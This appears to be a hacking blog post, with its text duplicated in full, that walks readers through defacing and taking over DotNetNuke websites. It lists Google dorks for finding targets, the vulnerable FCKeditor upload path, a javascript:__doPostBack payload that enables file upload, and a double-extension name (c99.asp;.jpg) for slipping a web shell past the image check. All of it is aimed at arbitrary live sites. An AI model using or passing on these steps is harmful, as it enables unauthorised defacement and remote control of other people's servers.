DNN hack
DNN [Dot Net Nuke] Exploit
First Check whether the Website is vulnerable or not
Or simply copy this code to google and hit enter:
OR
Open the home page and check any image which is located in /portals/0/
Check the location of the image. It should be located in /portals/0/
For e.g. in case of http://www.example.com ..the image is located at location- http://www.example.c...rtals/0/SHM.jpg
Yeah... it means this website is vulnerable and we can change the front page pic. Now the current image name is SHM.jpg. Rename the new image as SHM.jpg which you want to upload as a proof of you owned the system.
You can Also Upload Shells
Now here is the exploit
Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
HOW TO RUN ?
Simply copy paste it as shown below:
www.site.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
You will see the portal where it will ask you to upload. Select the third option File ( A File On Your Site)
After selecting the third option, replace the URL bar with below script
javascript:__doPostBack('ctlURL$cmdUpload','')
After running this JAVA script, you will see the option for Upload Selected File. Now select you image file which you have renamed as SHM.jpg & upload here. Go to main page and refresh...THAT,S IT you have hacked the website.
1. In our first step we check whether the Website is vulnerable or not by using google dorks. Search following code in google.
inurl:/portals/0
If you can check your desired domain than use below code. Here we can change .com to any desired domain like as .net, .org etc
inurl:/portals/0 site:.com
2. Now choose any website and copy the url of website without /portals/0 , and paste the below code after it.
Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
For ex. the website is http://www.abc.com/portals/0
remove the portals/0 and add the above code. It will become as http://www.abc.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
3. If you will get this screen means this website is vulnerable.
4. Now choose the third option where we can upload file.
5. Now in address bar replace the below code. This code allow us to upload any file from local computer.
javascript:__doPostBack(‘ctlURL$cmdUpload’,’’)
1 POINT TO BE NOTED: THAT THE SHELL THAT U ARE UPLOADING MUST BE IN jpg, png,btmp blah blah form .. for this
you must edit your shell Smile and save it as:
Code:
shell.format;.jpg
example i am using C99 shell and i will save it as:
Code:
c99.asp;.jpg
usually c99 is php type shell
NOW UPLOAD IT
NOW AFTER UPLOADING THE SHELL OPEN YOUR SHELL
CopyRights: Please Stop Stealing contents from our site i.e xedlgubaid.blogspot.com . I am working hard to create an article, you simply copying? Please respect our hard work. Atleast place backlink to our site & give credit to our blog/author. Hope you will understand our feelings.
First Check whether the Website is vulnerable or not
Or simply copy this code to google and hit enter:
:inurl:/tabid/36/language/en-US/Default.aspx
OR
inurl:/Fck/fcklinkgallery.aspx
inurl:/portals/0
Open the home page and check any image which is located in /portals/0/
Check the location of the image. It should be located in /portals/0/
For e.g. in case of http://www.example.com ..the image is located at location- http://www.example.c...rtals/0/SHM.jpg
Yeah... it means this website is vulnerable and we can change the front page pic. Now the current image name is SHM.jpg. Rename the new image as SHM.jpg which you want to upload as a proof of you owned the system.
You can Also Upload Shells
Now here is the exploit
Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
HOW TO RUN ?
Simply copy paste it as shown below:
www.site.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
You will see the portal where it will ask you to upload. Select the third option File ( A File On Your Site)
After selecting the third option, replace the URL bar with below script
javascript:__doPostBack('ctlURL$cmdUpload','')
After running this JAVA script, you will see the option for Upload Selected File. Now select you image file which you have renamed as SHM.jpg & upload here. Go to main page and refresh...THAT,S IT you have hacked the website.
1. In our first step we check whether the Website is vulnerable or not by using google dorks. Search following code in google.
inurl:/portals/0
If you can check your desired domain than use below code. Here we can change .com to any desired domain like as .net, .org etc
inurl:/portals/0 site:.com
2. Now choose any website and copy the url of website without /portals/0 , and paste the below code after it.
Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
For ex. the website is http://www.abc.com/portals/0
remove the portals/0 and add the above code. It will become as http://www.abc.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
3. If you will get this screen means this website is vulnerable.
4. Now choose the third option where we can upload file.
5. Now in address bar replace the below code. This code allow us to upload any file from local computer.
javascript:__doPostBack(‘ctlURL$cmdUpload’,’’)
1 POINT TO BE NOTED: THAT THE SHELL THAT U ARE UPLOADING MUST BE IN jpg, png,btmp blah blah form .. for this
you must edit your shell Smile and save it as:
Code:
shell.format;.jpg
example i am using C99 shell and i will save it as:
Code:
c99.asp;.jpg
usually c99 is php type shell
NOW UPLOAD IT
NOW AFTER UPLOADING THE SHELL OPEN YOUR SHELL
CopyRights: Please Stop Stealing contents from our site i.e xedlgubaid.blogspot.com . I am working hard to create an article, you simply copying? Please respect our hard work. Atleast place backlink to our site & give credit to our blog/author. Hope you will understand our feelings.
Comments
Post a Comment